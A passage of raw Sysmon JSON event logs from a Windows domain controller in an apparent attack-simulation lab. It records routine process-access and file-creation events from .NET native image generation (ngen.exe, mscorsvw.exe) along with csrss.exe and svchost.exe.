08:05:04.054","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2230-5F25-0000-0010D9390B00}","TargetProcessId":"2908","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6928,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:04.054\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2230-5F25-0000-0010D9390B00}\r\nTargetProcessId: 2908\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:04.054","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2230-5F25-0000-0010D9390B00}","TargetProcessId":"2908","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6929,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:04.054\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2230-5F25-0000-0010D9390B00}\r\nTargetProcessId: 2908\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:04.054","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2230-5F25-0000-0010D9390B00}","TargetProcessId":"2908","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6930,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:04.070\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2230-5F25-0000-0010DA3C0B00}\r\nTargetProcessId: 2836\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:04.070","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2230-5F25-0000-0010DA3C0B00}","TargetProcessId":"2836","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6931,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:04.070\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2230-5F25-0000-0010DA3C0B00}\r\nTargetProcessId: 2836\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:04.070","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2230-5F25-0000-0010DA3C0B00}","TargetProcessId":"2836","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6932,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:04.085\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2230-5F25-0000-0010DA3C0B00}\r\nTargetProcessId: 2836\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:04.085","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2230-5F25-0000-0010DA3C0B00}","TargetProcessId":"2836","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6933,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:05:04.163\r\nProcessGuid: {41C8662E-2230-5F25-0000-0010DA3C0B00}\r\nProcessId: 2836\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\b14-0\\Microsoft.GroupPolicy.ServerAdminTools.Private.GpmgmtpLib.dll\r\nCreationUtcTime: 2020-08-01 08:05:04.163","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:05:04.163","ProcessGuid":"{41C8662E-2230-5F25-0000-0010DA3C0B00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\b14-0\\Microsoft.GroupPolicy.ServerAdminTools.Private.GpmgmtpLib.dll","CreationUtcTime":"2020-08-01 08:05:04.163","EventReceivedTime":"2020-08-01 08:05:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6934,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:04.163\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2230-5F25-0000-00100B400B00}\r\nTargetProcessId: 4252\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:04.163","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2230-5F25-0000-00100B400B00}","TargetProcessId":"4252","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6935,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:04.163\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2230-5F25-0000-00100B400B00}\r\nTargetProcessId: 4252\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:04.163","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2230-5F25-0000-00100B400B00}","TargetProcessId":"4252","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6936,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:04.179\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2230-5F25-0000-00100B400B00}\r\nTargetProcessId: 4252\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 